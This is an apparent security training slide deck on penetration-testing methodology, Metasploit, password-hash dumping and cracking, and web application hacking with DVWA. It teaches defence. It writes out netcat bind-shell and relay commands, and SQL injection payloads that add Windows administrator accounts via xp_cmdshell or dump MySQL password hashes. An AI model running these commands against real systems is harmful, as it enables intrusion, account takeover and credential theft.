Hacking Steps

The document outlines various hacking methodologies and steps, including system and web application hacking, as well as the preparation and execution of penetration tests. It details the attack lifecycle, tools for footprinting, scanning, and exploitation, and emphasizes the importance of understanding vulnerabilities and security assessments. Additionally, it discusses the Metasploit framework and password exploitation techniques.

Agenda

❖ Hacking steps
❖ System hacking
❖ Web application hacking

Hacking Steps

How to attack our servers? / Security components

❖ Systems
  ❖ OS
  ❖ Software installed
❖ Network
  ❖ Sniffer
  ❖ Spoofing
  ❖ Flooding / DDoS
❖ Applications
❖ Data
❖ Operation

Risk / Information Security Principles

[Figure: The Elements of Risk - Vulnerabilities x Threats, leading to Loss and Damage]

PART 0
Preparing before Pentest

General Attack Lifecycle

Footprinting -> Scanning -> Profiling -> Entering -> Concealing -> Compromising -> Empowering

Attack Methodology

Footprinting: Gathering broad publicly available information, ARIN, IANA, web sites
Scanning: Using info from above, see what services run, ports opened, OS used
Enumeration: Use specific OS/service enumeration techniques to gather user account/shared/exported info
Penetration: First real attack phase
  Penetration failed -> Denial of Service
    • Tactics of last resort, an action of desperation (good job on your part)
    • Relatively unskilled attacker
  Penetration success -> Elevation of Privilege: Attempt to become root/superuser/admin
Pilfering of Data: Altering & copying data
Cover Tracks: Edit/erase audit logs
Leaves Backdoor: For next visit… hihihihihi

VA vs. Pentest

Vulnerability Assessment (VA)
• Some call it Security Assessment
• Classifies the system vulnerabilities into risk levels (high, medium, low)

Penetration Testing (Pentest)
• Implements VA as part of the process + Proof of Concept
• Tries as much as possible to make management visualize the findings in terms of business risk

Security Posture Assessment (SPA)
• Quite popular recently (past 4-5 years)
• Not only focused on the technology alone but on the people + process (with policy)

Inside Pentest Mindset

Successful pentesters & ethical hackers
• Think out of the box, are pragmatic, do things differently
• But still need to be thorough, methodical, careful (with good notes taken) & make the work repeatable
• Balance between both is the most crucial factor
• Have the creative & "thinking like a bad guy" mindset
• Propose every method to be used during the scoping & rules of engagement (RoE)
Overall PenTest Process

Preparation
• If applicable, sign a Non-Disclosure Agreement (NDA)
• Discuss the nature of the test with target personnel (business concerns, rules of engagement, test scope)
• Sign off on the permission (get-out-of-jail-free card)
• Assign the team

Testing
• Perform detailed testing (internal & external), depending on the scope

Conclusion
• Analyze test results & retest (with documentation)
• Prepare a thorough report & presentation

Public Pentest Methodologies
• Various organizations have released free network scanning and penetration testing methodologies
• They can provide useful source documentation for formalizing your own customized test plan
• Some notable references:
  • Open Source Security Testing Methodology Manual (OSSTMM) from ISECOM
  • NIST Special Publication 800-42: Guideline to Network Security Testing
  • Open Web Application Security Project (OWASP)
  • Penetration Testing Framework from Toggmeister

Activities
❖ Footprinting
❖ Scanning
❖ Exploitation
❖ Post Exploitation
❖ Password
❖ Backdoor / Trojan

PART 1
Footprinting

Footprinting - Google Dorks

❖ Some common Google keyword searches:
  ❖ intitle: index of "parent directory"
  ❖ inurl:.go.th
  ❖ filetype: or ext:
  ❖ site: operator
  ❖ admin login page
  ❖ intranet | help.desk

Search people

johny.ihackstuff

Social Networking Attack

❖ All details published - phone numbers, date of birth, email, nicknames, pets' names etc.
❖ Contribute towards:
  ❖ Answering secret questions
  ❖ Generating a dictionary list for password attacks
  ❖ Real-time location
  ❖ Social engineering

War Dialing

❖ Technique of using a modem to automatically scan a list of telephone numbers (in search of computers, bulletin board systems, fax machines etc.)
IP Address

❖ Dotted Decimal
  ❖ 192.168.20.59
❖ Binary
  ❖ 11000000.10101000.00010100.00111011
❖ Decimal
  ❖ 3232240699
❖ Hexadecimal
  ❖ 0xC0.0xA8.0x14.0x3B

What more can we learn about an IP?

❖ IP owner's name or provider
❖ Contact point
❖ Email address
❖ Telephone number
❖ Route
❖ Active or not?
❖ Opened ports
❖ Vulnerabilities

Recommended tools

❖ Whois – IP address information
❖ Tracert/Traceroute – Determine the path to another host
❖ Ping – Detect if another host is reachable
❖ nslookup – Resolve DNS
❖ Dig – Utility for checking DNS resolution
❖ Wireshark – Network sniffer (use with care)
❖ Nmap – Port scanner (use with care)
❖ Nessus – Vulnerability scanner (use with care)

Whois

❖ IP registration database
❖ http://www.dnstuff.com
Whois result

Tracert / Traceroute

Ping

nslookup

Dig

Exercises

❖ Use Google dorks keywords
❖ Check your server's IP address and other information
❖ Discuss what you found

Scanning
• Scanning is meant to identify live machines, open & closed ports, service versions and the OS used.
• Also includes vulnerability detection (based on signatures)

PART 2
Scanning
Goal of Scanning

❖ Overall: learn more about the target and find openings by interacting with the target
❖ Determine network addresses of live hosts, firewalls, routers, etc. in the network
❖ Determine the network topology of the target environment
❖ Determine the operating system types of discovered hosts
❖ Determine the open ports & services (with versions, if possible - via banner grabbing/testing)
❖ Determine the list of potential vulnerabilities

Scan using Nmap

Nmap Active OS Fingerprinting

Nmap attempts to determine the target OS by sending various packets and measuring the response. Different systems have different protocol behaviors that can be triggered & measured (30 different methods in 2nd Gen OS FP):
• TCP ISN Greatest Common Denominator (GCD)
• TCP ISN Counter Rate (ISR)
• TCP/ICMP IP ID Sequence Generator Algorithm
• Shared IP ID Sequence Boolean
• TCP Timestamp Option Algorithm
• TCP Initial Window Size

Method for discovering vulnerabilities

❖ Check the software version number (includes protocol version)
❖ Look at its behaviors - somewhat invasive
❖ Check its configuration - more invasive
  ❖ Requires access to the target
  ❖ Or configuration documentation from target environment personnel
❖ Run an exploit against it - potentially dangerous but useful
  ❖ A successful exploit shows the vulnerability is present
  ❖ Helps to lower false positives (failed exploits don't indicate a secure system)
Nmap

❖ Port scanning tool
❖ Both GUI and command line
❖ Free download at http://www.nmap.org
❖ Compatible with Windows, Linux and MacOS
❖ Last version is 5.6x

Nmap (Windows)

Nessus

❖ Free download at http://www.nessus.org
❖ Vulnerability scanner
❖ Last version is 5
❖ Compatible with Linux, MacOS and Windows
❖ 2 software components
  ❖ Nessus Server
  ❖ Nessus Client
Exercises

❖ Use Nessus to scan my server
❖ Use Nmap
  ❖ nmap -sn 192.168.100.0
  ❖ nmap -sS 192.168.100.20
❖ Use MBSA
  ❖ try your machine
  ❖ try 172.17.50.130

PART 3
Exploitation

Exploitation

• Attackers will either exploit the known services by manually writing exploit code or use available exploitation frameworks – Metasploit/CANVAS/Core Impact

About Metasploit

❖ Has existed in various versions since July 2003.
❖ Version 1.0 by HD Moore (Perl scripting language & provided a curses-based frontend)
❖ 2nd version (2.x), a collaboration between spoonm, Matt Miller (skape), HD Moore and other small contributors (also in Perl)
❖ 3rd version (including the current one), developed by Metasploit LLC, is a complete rewrite using the Ruby language.
❖ Made available for use by Rapid7 under the 3-clause BSD license
Metasploit Features

❖ Runs on various OS platforms (Windows, Linux, BSD & MacOS X)
❖ Also able to run on Linux-based PDAs, iPhone (jail-broken)
❖ Supports a wide range of exploits & is updated on a regular basis
❖ Current version (3.x) uses 'svn update'
❖ Not only home of Windows OS & services exploits but also includes client-side attacks & appliance vulnerabilities
❖ Developer-friendly & ready-for-use payloads
❖ Many features built-in (Windows SP independence, retrieving stack pointer, various encoders, converter from exe to vbs, etc.)
❖ Payload: even supports 64-bit platforms & IPv6 infrastructure

Metasploit Framework Components

[Diagram: User interface; Exploit Development Support Tools (payload injection tools, vuln finding tools, armoring tools to dodge detection & filter, memory region size/location & offset helper); Exploit 1..n paired with Payload 1..n; Exploit + Payload + Tgt Info -> Launcher -> Send to target]

Interacting with Metasploit

GUI interface (Armitage)

Interacting with Metasploit

GUI interface (msfgui)
List of exploits

❖ Common Windows OS vulnerabilities & services exploits
  ❖ Windows Plug and Play Overflow
  ❖ Microsoft ASN.1 attack against LSASS
  ❖ RPC DCOM (several)
❖ Other OSes' vulnerabilities (UNIX, Linux, Mac OS X, BSD)
  ❖ HP Openview connectedNodes.ovpl Remote Command Execution
  ❖ AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
❖ Client-side components
  ❖ AOL Instant Messenger goaway Overflow
  ❖ Microsoft Excel Malformed FEATHEADER Record Vulnerability
❖ Back-up solutions
  ❖ VERITAS NetBackup Remote Command Execution
  ❖ Arkeia Backup Client Type 77 Overflow

List of Payloads

❖ Customized payloads to suit the OS platform
  ❖ Windows/ Linux/ Solaris/ AIX/ BSD/ OSX
❖ Some payload types
  ❖ singles: stand-alone (everything bundled)
  ❖ stagers: piece-parts which load first to allow the stage to communicate later
  ❖ stages: piece-parts which implement the function through the stager
  ❖ stagers (comm) + stages (function) = full payload
❖ Windows Singles
  ❖ adduser, exec, download_exec, shell_bind_tcp, shell_bind_tcp_xpfw

Stager + Stage

❖ Windows Stagers
  ❖ bind_tcp: listen on a TCP port for a new connection (IPv6, No NX or Win7)
  ❖ find_tag: use the existing TCP connection that the exploit was delivered over
  ❖ reverse_tcp: make a reverse connection from target back to attacker (IPv6, No NX or Win7)
  ❖ reverse_ord_tcp: make a reverse connection using ws2_32.dll already loaded into the memory of the exploited process
  ❖ passivex: run an ActiveX control in IE for reverse HTTP communication
❖ Windows Stages
  ❖ dllinject: inject an arbitrary DLL into target memory
  ❖ upexec: upload and run an executable
  ❖ vncinject: VNC remote GUI control
  ❖ shell: Windows cmd.exe shell
  ❖ meterpreter: flexible specialized shell environment

VNCInject Stage
Meterpreter

❖ Meterpreter = Metasploit Interpreter
❖ Most of the hard-core development done by Skape
❖ Consists of a series of DLLs injected into process memory
❖ Meterpreter (for Linux & Mac OS X) also available
❖ Extensive modules
  ❖ Core: sysinfo, shutdown, reboot, reg
  ❖ Stdapi: file system (cd, cat, download, mkdir, edit), process (getpid, ps, kill, migrate), network (ipconfig, portfwd, route)
  ❖ Additional modules - Priv: timestomp, hashdump; Incognito: token stealing
❖ Ready-made scripts for various functionalities
❖ Why Meterpreter?
  ❖ Does not create a separate process (runs inside the exploited process)
  ❖ Pure manipulation of memory, does not touch the hard drive
  ❖ Does not need any system-provided command executables (all built-in)

PART 4
Post Exploitation - Password

Human and Password

❖ Passwords are everywhere
  ❖ OS login, online accounts (banks, email, various systems)
❖ Humans, however
  ❖ Find it hard to memorize meaningless & complex words
  ❖ Based on a study: on average 3 unique strong passwords (highest entropy) for each human (max 5)
❖ Though many technologies allow resetting passwords, a pentest may include password recovery (brute-force/ dictionary)
❖ Breaking one password could lead to more resources relevant to the case.

Password Weakness

❖ Users choose passwords that are easy to remember and often choose the same sequence of characters as they have for their UserIDs.
❖ Users also frequently select names of family members, their pets, or their favorite sports team for their passwords.
❖ Users frequently use the same password for all accounts on many systems.
  ❖ If one account is broken, all other accounts are subsequently also vulnerable to attack.
Windows password

❖ Locally, in the SAM database, Windows stores passwords as:
  ❖ LANMAN hash (extremely weak)
  ❖ NT Hash (stronger)
  Both are not salted!
❖ Default: both hashes stored in NT, 2000, XP & 2003. Only the NT hash is stored in Vista & 2008 (although this can be altered).
❖ With AD, domain controllers store account information, including both hashes, in %systemroot%\ntds\ntds.dit
  ❖ Typically quite large (more than 50MB even for a few accounts)
  ❖ No parsing tool publicly released

Obtaining windows password

❖ Pull hashes from the local SAM as well as the AD database
  ❖ DLL injection into the LSASS process (to extract hashes) using the Windows CreateRemoteThread API
  ❖ When complete, tools delete artifacts left on the target's file system
❖ Pwdump family
  ❖ pwdump2 to pwdump3 (may crash LSASS due to Windows DEP, forcing a reboot)
  ❖ pwdump3e to pwdump6 (low chance of crash - marking injected code as executable, encrypting hashes as they move across the network)
❖ Fgdump (from Fizzgig, Foofus hacking group)
  ❖ Addresses the problem of AV tools deleting pwdump programs and DLLs copied to the target file system for extraction
  ❖ Before moving files, fgdump remotely disables AV tools and then moves files to dump password hashes

Obtaining windows password

❖ Metasploit Meterpreter hashdump capability
  ❖ Using the Metasploit priv module (dumps from the local machine)
  ❖ Does not require remote NetBIOS or SMB access
  ❖ Does not copy files to the target's file system
  ❖ Entirely memory resident with a DLL running inside the exploited process (smaller footprint for a forensic investigator)
  ❖ Does not have issues with DEP
❖ Sniffing Windows Challenge-Response Authentication
  ❖ Dealing with LANMAN challenge/response, NTLMv1, NTLMv2, Microsoft Kerberos

Linux password

❖ Relies on the underlying crypt(3) function of the OS
  ❖ Input: user's password, random salt
  ❖ Output: text string
  ❖ Stored in /etc/passwd or /etc/shadow
❖ Algorithm used to formulate the password representation varies
  ❖ Traditional DES - old Linux/ UNIX (some still use it)
  ❖ MD5 - the most common now (hash starts with $1$)
  ❖ BSDi Extended DES (hash starts with _ )
  ❖ SHA-256 (prefaced by $5$), SHA-512 (prefaced by $6$) - used by some Linux distros
Obtaining Linux password

❖ Grab a copy of /etc/passwd
  ❖ Contains login names, UID numbers and possibly password representations (if not shadowed)
  ❖ Readable by any account on the system
❖ Grab a copy of /etc/shadow
  ❖ Contains password representations, security settings, etc.
  ❖ Readable only by accounts with UID 0
❖ Combine the two together with a script
  ❖ John the Ripper's unshadow script pulls account info from /etc/passwd and password info from /etc/shadow, creating one resulting file suitable for cracking

Cain & Abel

❖ Written by Massimiliano Montoro (free at www.oxid.it)
❖ Mainly focused on password cracking (but can do more!)
  ❖ Windows-type passwords (LANMAN, NT, LANMAN challenge/response, NTLMv1, NTLMv2, MS Kerberos5 PreAuth)
  ❖ Non-Windows passwords (Cisco IOS Type 5 enable, Cisco PIX enable, APOP-MD5, VNC-3DES, RADIUS Pre-Shared Secret, IKE Pre-Shared Key, Oracle, MySQL and many more)
  ❖ NOT SUPPORTED: DES and MD5 Linux/ UNIX passwords (since they are salted)
❖ It can also sniff passwords (or password hashes) directly from the network
❖ Other features:
  ❖ SIP/ RTP-to-WAV file converter
  ❖ SecureID Token Generator
  ❖ Box Revealer (reveals what's behind ******* in a password box via DLL injection)
  ❖ Hash calculator
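As an added example (not from the slides or from John the Ripper), the following Python joins passwd and shadow entries on the login name the way the unshadow step does, then names each account's crypt(3) scheme from the hash-field prefixes listed on the Linux password slide and flags accounts still stored with DES or MD5. The sample files and hash strings are constructed placeholders, not real accounts or working hashes.

```python
import re

# Constructed sample files in /etc/passwd and /etc/shadow format. These are
# not real accounts, and the hash fields are placeholders with the right
# shape (prefix and length), not working crypt(3) outputs.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
legacy:x:1001:1001:Old app:/srv/legacy:/bin/sh
olduser:x:1002:1002:Imported:/home/olduser:/bin/sh
svc:x:1003:1003:Service:/nonexistent:/usr/sbin/nologin
"""
SHADOW_SAMPLE = """\
root:$6$saltsalt$PLACEHOLDERSHA512HASHPLACEHOLDERSHA512HASH:19000:0:99999:7:::
alice:$5$saltsalt$PLACEHOLDERSHA256HASHPLACEHOLDER:19000:0:99999:7:::
legacy:$1$saltsalt$PLACEHOLDERMD5HASH:19000:0:99999:7:::
olduser:abPLACEHOLDR1:19000:0:99999:7:::
svc:*:19000:0:99999:7:::
"""

# DES and MD5 crypt are the schemes the slides call old/common; both are
# treated as legacy storage here.
WEAK_SCHEMES = {"DES", "MD5"}


def identify_scheme(field):
    """Name the crypt(3) scheme from a shadow password field, using the
    prefixes on the slide. Traditional DES has no prefix: it is a bare
    13-character string."""
    if field == "":
        return "empty"                    # no password at all
    if field.startswith(("*", "!")):
        return "locked"                   # password login disabled
    if field.startswith("$1$"):
        return "MD5"
    if field.startswith("$5$"):
        return "SHA-256"
    if field.startswith("$6$"):
        return "SHA-512"
    if field.startswith("_"):
        return "BSDi Extended DES"
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "DES"
    return "unknown"


def parse_colon_file(text, field_count):
    """Split passwd/shadow style lines into a login -> fields mapping."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < field_count:
            continue                      # skip malformed lines
        entries[parts[0]] = parts
    return entries


def merge_passwd_shadow(passwd_text, shadow_text):
    """Join the two files on login name, as the unshadow step does, keeping
    the UID from passwd and the hash field from shadow (an 'x' in passwd
    means the representation lives in shadow)."""
    passwd = parse_colon_file(passwd_text, 7)
    shadow = parse_colon_file(shadow_text, 9)
    merged = {}
    for login, fields in passwd.items():
        hash_field = fields[1]
        if hash_field == "x" and login in shadow:
            hash_field = shadow[login][1]
        merged[login] = (int(fields[2]), hash_field)
    return merged


def audit_accounts(passwd_text, shadow_text):
    """Map each login to (scheme, finding): 'weak' for DES/MD5 storage,
    'no-password' for an empty field, otherwise 'ok'."""
    report = {}
    for login, (_uid, hash_field) in merge_passwd_shadow(passwd_text, shadow_text).items():
        scheme = identify_scheme(hash_field)
        if scheme == "empty":
            finding = "no-password"
        elif scheme in WEAK_SCHEMES:
            finding = "weak"
        else:
            finding = "ok"
        report[login] = (scheme, finding)
    return report


if __name__ == "__main__":
    for login, (scheme, finding) in audit_accounts(PASSWD_SAMPLE, SHADOW_SAMPLE).items():
        print(f"{login:10} {scheme:18} {finding}")
```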

John the Ripper

❖ By Solar Designer & available for free at www.openwall.com/john
❖ There is also a commercial version, John The Ripper Pro
  ❖ Includes pre-compilation, auto-detection of processor acceleration options (MMX, SSE2, etc.) and a big multilingual wordlist (around 4.1 million entries)
❖ Available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS
❖ Can crack a lot of password types:
  ❖ Linux/ UNIX: traditional DES - various modes, MD5, Blowfish, etc.
  ❖ Windows: LANMAN (native), NT (with patch), LANMAN challenge/response (with patch & OpenSSL), NTLMv1 (also with patch & OpenSSL)
  ❖ Others: S/Key (one-time password mechanism - hardly found today), Kerberos v5, Andrew File System (AFS) Kerberos v4, Netscape LDAP SHA, MySQL

Password Attack Methodology

❖ Dictionary attack – fastest attack with a large dictionary (more than 100k words)
  ❖ A customized dictionary will give a higher probability of success
  ❖ Try to use wyd from www.remote-exploit.org/codes_wyd.html
❖ Brute-force attack – takes a long time & is an exhaustive search
❖ Hybrid attack – combination of both brute force & dictionary attack
❖ Pre-Computed Password Hash table (PCPH) – i.e. a Rainbow table containing most of the password hashes
Planting Malware

❖ Trojan: malicious, security-breaking program that disguises itself as a useful program, mainly allowing one to control a user's system
  ❖ Like viruses, trojans do not distribute themselves from one system to another
  ❖ Back Orifice (port 31337 or 31338), Netbus (port 12345 or 12346), Netcat, Tini
  ❖ Commonly distributed via peer-to-peer sharing, IRC, warez sites, pornography sites
❖ Bots: software programs that perform some action on behalf of a human (with little or no human intervention)
  ❖ Used to control large numbers of systems (so-called bot-nets)
  ❖ The attacker usually controls all infected machines (zombies) via a command & control center (C&C)
  ❖ Bot communication channels: IRC on the standard port (TCP 6667), IRC on a non-standard port, distributed P2P communications, social networking sites (Twitter, YouTube, Google documents, etc.)

PART 4B
Post Exploitation - Backdoor / Trojan

Netcat - Backdoor

❖ The most useful tool for both network admins & attackers
❖ Application-level backdoor listener (on both Windows & UNIX)
❖ Has a lot of great functions
  ❖ File transfer (both push & pull) - dealt with in raw form
    ❖ nc -l -p 1234 < tx_file_name
    ❖ nc 10.0.0.x 1234 > rx_file_name
  ❖ Provides shell access for Windows & Linux/ UNIX
    ❖ nc -l -p 1234 -e /bin/sh (Linux/ UNIX)
    ❖ nc -l -p 1234 -e cmd.exe
  ❖ Works as a relay to other attacks
    ❖ cd /tmp
    ❖ mknod backpipe p
    ❖ nc -l -p 1234 0<backpipe | nc 10.0.0.x 4321 | tee backpipe
  ❖ Can even be used as a simple port scanner
    ❖ nc -v -n -z -w1 10.0.0.x 1-1024

Transformer - Malware in Disguise

❖ Most malware (especially backdoors) originally gave/renamed themselves to other names common in the OS
  ❖ UNIX/ Linux OSes
    ❖ initd, init, inet, cron, network, httpd, httpb
  ❖ MS Windows OSes
    ❖ svchost, win, iexplore
❖ Prior to Vista & Windows 2008, Task Manager and taskkill.exe cannot kill: csrss.exe, services.exe, smss.exe, system, system idle process, winlogon.exe
Thank You

Web Application Security

Contact me: Kitisak Jirawannakool
[email protected]
[email protected]
http://www.ega.or.th

Agenda

! OWASP (WebGoat)
! Simplest hacking techniques
! SQL injection
! Cross-site scripting
! How to protect our website?

Why do we need it?

❖ Try it ourselves
  ❖ Access your website which has a login page
  ❖ Type " 'or' '=' " in both the username and password fields
  ❖ Log in and see the results
❖ Questions
  ❖ Easy to hack?
  ❖ Do we know how to protect it?
What is OWASP? Open Web Application Security Project

! Open Web Application Security Project
! http://www.owasp.org
! Open group focused on understanding and improving the security of web applications and web services!
! Hundreds of volunteer experts from around the world

Problems

System integrity
• Theft of service
• Warez or pornography uploads
• Pirate servers and applications
• Password sniffing
• Rootkit and Trojan program installation
• Distributed Denial of Service participation

Data integrity
• Vandalism, data tampering, or site defacement
• Inadvertent file deletion or modification

Data confidentiality
• Theft of personal information
• Leakage of personal data into URLs and logs
• Unauthorized use of resources

System and network availability
• Denial of Service
• Crash/freeze from resource exhaustion (e.g., memory, disk, process space, file descriptors, or database connections)

Goals

Attack type: Denial of service
Description: Any of the network, web-server, or application-based attacks that result in denial of service, a condition in which a system is overloaded and can no longer respond normally.
Mitigation: Prepare for attacks. Inspect the application to remove application-based attack points.

Attack type: Exploitation of configuration errors
Description: These errors are our own fault. Surprisingly, they happen more often than you might think.
Mitigation: Create a secure initial installation. Plan changes, and assess the impact of changes before you make them. Implement independent assessment of the configuration on a regular basis.

Attack type: Exploitation of Apache vulnerabilities
Description: Unpatched or unknown problems in the Apache web server.
Mitigation: Patch promptly.

Attack type: Exploitation of application vulnerabilities
Description: Unpatched or unknown problems in deployed web applications.
Mitigation: Assess web application security before each application is deployed.

Attack type: Attacks through other services
Description: This is a "catch-all" category for all other unmitigated problems on the same network as the web server. For example, a vulnerable MySQL database server running on the same machine and open to the public.
Mitigation: Do not expose unneeded services, and compartmentalize.

Why do we need web application security?

Your security "perimeter" has huge holes at the application layer.

[Diagram: Application Layer - Human Resources, Legacy Systems, Web Services, Databases, Directories, Billing, Custom Developed Application Code (APPLICATION ATTACK); Network Layer - App Server, Web Server, Hardened OS, Firewall, Firewall]

You can't use network layer protection (firewall, SSL, IDS, hardening) to stop or detect application layer attacks.

Securing the network is not enough

❖ Network Security mostly ignores the contents of HTTP traffic, such as....
  ❖ Firewalls, SSL, Intrusion Detection Systems
  ❖ Operating System Hardening, Database Hardening
❖ Need to secure the web application (not Network Security)
  ❖ Securing the "custom code" that drives a web application
  ❖ Securing libraries
  ❖ Securing backend systems
  ❖ Securing web and application servers

What is Web Application Security?

! Not Network Security
  ! Securing the "custom code" that drives a web application
  ! Securing libraries
  ! Securing backend systems
  ! Securing web and application servers
! Network Security mostly ignores the contents of HTTP traffic
  ! Firewalls, SSL, Intrusion Detection Systems, Operating System Hardening, Database Hardening
OWASP Top 10 Application Security Risks - 2010

1. Injection
2. Cross Site Scripting (XSS)
3. Broken Authentication and Session Management
4. Insecure Direct Object References
5. Cross Site Request Forgery (CSRF)
6. Security Misconfiguration
7. Insecure Cryptographic Storage
8. Failure to Restrict URL Access
9. Insufficient Transport Layer Protection
10. Unvalidated Redirects and Forwards

https://www.owasp.org/index.php/Top_10_2010-Main

What is WebGoat?

! Deliberately insecure J2EE web application
! Maintained by OWASP
! Designed to teach web application security lessons
! For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.
! Why the name "WebGoat"?
  ! Developers should not feel bad about not knowing security. Even the best programmers make security errors. What they need is a scapegoat, right? Just blame it on the 'Goat!

Overview

! WebGoat is written in Java and therefore installs on any platform with a Java virtual machine.
! Needs Java and Tomcat
! Supports Linux, OS X Tiger, FreeBSD and Windows
! Once deployed, the user can go through the lessons and track their progress with the scorecard. There are currently over 30 lessons, including those dealing with the following issues:

Example of lessons

! Cross-site Scripting (XSS)
! Access Control
! Thread Safety
! Hidden Form Field Manipulation
! Parameter Manipulation
! Weak Session Cookies
! Blind SQL Injection
! Numeric SQL Injection
! String SQL Injection
! Web Services
! Fail Open Authentication
! Dangers of HTML Comments
! ... and many more!
Weak Session Cookies

65432ubphcfx

DVWA

! Damn Vulnerable Web Application
! http://www.dvwa.co.uk
! PHP/MySQL
! Vulnerable web application for security testing
! Freeware

DVWA
Username : admin
Password : password

DVWA Configure
! Setup -> Create/Reset Database
! DVWA Security -> Low -> Submit
Simplest hacking techniques

! SQL Injection
! Cross Site Scripting (XSS)
! Password attacking

SQL Injection Attacks

"SQL injection is a security vulnerability that occurs in the database layer of an application. Its source is the incorrect escaping of dynamically-generated string literals embedded in SQL statements." (Wikipedia)

SQL Injections

Impact of SQL Injection - Dangerous

❖ At best: you can leak information
❖ Depending on your configuration, a hacker can
  ❖ Delete, alter or create data
  ❖ Grant access to the hacker silently
  ❖ Escalate privileges and even take over the OS

SQL Injection Attacks

❖ Login Example Attack
  – Text in blue is your SQL code, text in orange is the hacker input, black text is your application code
❖ Login: Password:
❖ Dynamically build the SQL string performing authentication:
  ❖ "SELECT * FROM users WHERE login = '" + userName + "' and password= '" + password + "'";
❖ Hacker logs in as: ' or '' = '; --
  – SELECT * FROM users WHERE login = '' or '' = ''; --' and password=''

More Dangerous SQL Injection Attacks

❖ Hacker creates a Windows account:
  – SELECT * FROM users WHERE login = ''; exec master..xp_cmdshell 'net users username password /add';--' and password= ''
❖ And then adds himself as an administrator:
  – SELECT * FROM users WHERE login = ''; exec master..xp_cmdshell 'net localgroup Administrators username /add';--' and password= ''
❖ SQL Injection examples are outlined in:
  – http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf
  – http://www.unixwiz.net/techtips/sql-injection.html
Preventing SQL injection

❖ Use Prepared Statements (aka Parameterized Queries)
  ❖ "select * from accounts where id = " + id
  vs
  ❖ "select * from accounts where id = ?"
❖ Validate input
  ❖ Strong typing
    ❖ If the id parameter is a number, try parsing it into an integer
  ❖ Business logic validation
    ❖ If you are expecting a telephone number, test it with a Regular Expression

Preventing SQL injection - Continued

❖ Use the principle of least privilege
  ❖ If the query is reading the database, do not run the query as a user with update permissions (dbo, drop, etc.)
  – Quiz: Is running a Web Application as the Database System Admin "sa" account a good practice?
❖ ESCAPE questionable characters (ticks, --, semi-colon, brackets, etc.)
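An added example (not code from the slides) that puts the login query from the slides next to its parameterized form and the strong-typing check for the id parameter, using Python's built-in sqlite3 in place of the slides' MySQL/MSSQL so it runs offline. The users table and its two rows are constructed demo data; the injected string is the slide's `' or '' = '`, placed in the password field so the query stays a single statement.

```python
import sqlite3

# Constructed demo database (not from the slides): a users table in memory.
# Passwords are kept in plain text only so the slide's query can be
# reproduced verbatim; a real application stores salted password hashes.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (login, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, user_name, password):
    """The slide's pattern: SQL text assembled by concatenation, so quote
    characters typed by the user become part of the SQL grammar."""
    sql = ("SELECT * FROM users WHERE login = '" + user_name +
           "' and password = '" + password + "'")
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return []       # unbalanced quotes just fail the login in this demo


def login_safe(conn, user_name, password):
    """Prepared statement: values are bound to ? placeholders as data and
    are never parsed as SQL, whatever characters they contain."""
    sql = "SELECT * FROM users WHERE login = ? and password = ?"
    return conn.execute(sql, (user_name, password)).fetchall()


def parse_id(raw):
    """Strong typing for the accounts-by-id query on the slide: the
    parameter must be a non-negative integer; anything else is rejected
    before it gets near the database."""
    try:
        value = int(raw)
    except (TypeError, ValueError):
        return None
    return value if value >= 0 else None


def account_by_id(conn, raw_id):
    """Typed lookup: validate first, then still bind the value as a parameter."""
    ident = parse_id(raw_id)
    if ident is None:
        return []
    return conn.execute("SELECT * FROM users WHERE id = ?", (ident,)).fetchall()


# The injected string from the slide's login example, used in the password
# field (no trailing comment needed, so sqlite3 sees one statement).
INJECTED = "' or ''='"

if __name__ == "__main__":
    db = make_db()
    # Concatenation: WHERE login = 'anyone' and password = '' or ''='' -> every row
    print("vulnerable:", login_vulnerable(db, "anyone", INJECTED))
    # Parameterized: the same string is compared literally -> no rows
    print("safe:      ", login_safe(db, "anyone", INJECTED))
    print("typed id:  ", account_by_id(db, "1; drop table users"))
```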

Ex.1 SQL Injection

❖ Learn to inject SQL commands on DVWA
❖ Understand how weak a web application can be
❖ Learn how to prevent this attack
❖ Know how to program securely

SQL Injection
SQL Injection - Try these commands and explain

! a' OR '1'='1
! ' UNION ALL SELECT user,password FROM users;#
! a' UNION ALL SELECT system_user(),user();#

http://www.securiteam.com/securityreviews/5DP0N1P76E.html
http://en.wikipedia.org/wiki/SQL_injection
http://www.unixwiz.net/techtips/sql-injection.html
Challenge questions

! Find the current version of MySQL
  a' UNION ALL SELECT 1, @@version;#
! List the password hashes
  1' UNION ALL SELECT user, password FROM mysql.user; -- priv;#'
! Find the database name
  a' OR database() LIKE '%A%';#
! Find the table name
  a' UNION SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema LIKE '%dv%
How to fix

! Check all input
  ! type
  ! size
! mysql_real_escape_string()
  abc' or '1'='1
  abc\' or \'1\'=\'1

Cross Site Scripting (XSS)

The impact of XSS

❖ Data residing on the web page can be sent anywhere in the world
  ❖ Including cookies!
❖ Facilitates many other types of attacks
  ❖ Cross-Site Request Forgery (CSRF), Session Attacks (more later)
❖ Your site's behavior can be hijacked

Preventing XSS

❖ Escape all user input when it is displayed
  ❖ Escaping converts the output to harmless HTML entities
  ❖ <script> becomes &lt;script&gt;
  ❖ but is still displayed as <script>
❖ Methods:
  ❖ Java Standard Tag Library (JSTL) <c:out/>
  ❖ org.apache.commons.lang.StringEscapeUtils
  ❖ NOTE: Java's Expression Language (EL) does not escape output!
Preventing XSS - Continued

❖ Ensure your filter uses a white list approach
  ❖ Filters based on blacklisting have historically been flawed
    ❖ E.g. Ruby on Rails sanitize method
  ❖ New encoding schemes can easily bypass filters that use a blacklist approach
❖ Do not accept and reflect unsolicited input
  ❖ Reflecting every parameter for confirmation pages
